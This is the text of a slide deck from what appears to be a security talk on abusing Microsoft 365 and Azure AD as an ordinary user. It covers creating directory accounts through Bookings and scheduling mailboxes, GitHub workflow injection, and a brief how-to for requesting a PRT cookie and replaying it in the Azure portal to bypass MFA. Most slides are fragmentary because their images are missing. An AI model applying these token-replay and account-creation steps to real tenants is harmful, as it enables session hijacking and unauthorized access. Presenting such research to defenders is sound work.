Title Text

1/337

Speedrun edition

Features

  • Group, bookings and scheduling mailbox
  • Github workflow injection
  • Asking PRT Cookie 

2/337

Ceci n'est pas un rump sur le cyclimse

Group

(and user info sometime)

3/337

Warning:
- Je n'ai jamais installé ni (A)AD ni O365, mon vocabulaire pourrait être approximatif

4/337

En cliquant sur compte on peut parfois changer nom/prénom alors que sur myAccount on peut pas.

5/337

Le groupe est visible dans la liste de contact

6/337

Bookings

Most official way

7/337

Toutes les cascades dans ces slides sont réalisés en simple user.

8/337

Du coup, Sasuke c'est mieux que Naruto

9/337

Exchange/outlok à l'air de créer un compte membre dans l'AD

10/337

Pro

- Nice interface

- Fully managed

- No code

- User created on AAD

Con

- Weird name to mailbox conversion (remove dot, lowercase, ...)
- Booking can be disabled (33% of success)

11/337

Scheduling mailbox

The forgotten API?

12/337

On dit "retro compatible"

13/337

PB: cga8U9Wd / RTFM

Well, use -Scope CurrentUser to install without local admin right

Pro

- Better control than bookings

- Should be disabled in addition to booking (100% success)

- We can choose domain!

Get-AcceptedDomain

- Create a member in (A)AD

Con

Scheduling mailbox are still limited (can't login)

14/337

https://outlook.office.com/mail/sasuke@orga.com for read/write email

Github workflow injection

15/337

Messieurs de synacktiv, fermez les yeux 3 minutes

Documented

16/337

17/337

C'est comme eval(`alert('${userInput}')`);

18/337

19/337

Indirect run can be impacted

Did you know Tribanol?

21/337

Several "alias" to run

PRT Cookie

Asking politely

22/337

GetCookieInfoForUri pour les intimes

23/337

24/337

PB: kue64T0B / RTFM

(C'est un zero)

AADInternal a été mis à jour hier, cool !

How to

Go to portal.azure.com
- redirect to login
- edit/add cookie as provided

- Go again on portal.azure.com

- Enjoy

TTL ?

Session SSO: 5 minutes ?
Portal: a few hours ?

Teams: a week ?

outlook: did it even renew?

Other orga linked to SSO ?

25/337

Other ?

PRT Cookie is provided after MFA, and most policies to restrict account login ...

26/337

27/337

PB: CZ2jzdEx / RTFM

Nice parser, hopefully client will sanitize

More ?

28/337

Once powershell module installed:
- Get-Module: get list of module (look at tmp one)
- Get-Command -ListImported -Module tmpEXO_blah.blah

 

Powershell Exchange

29/337

30/337

Nothing here

The end

337/337

Ps: Claire elle est trop cool.

deck

By Tr4l

deck

  • 328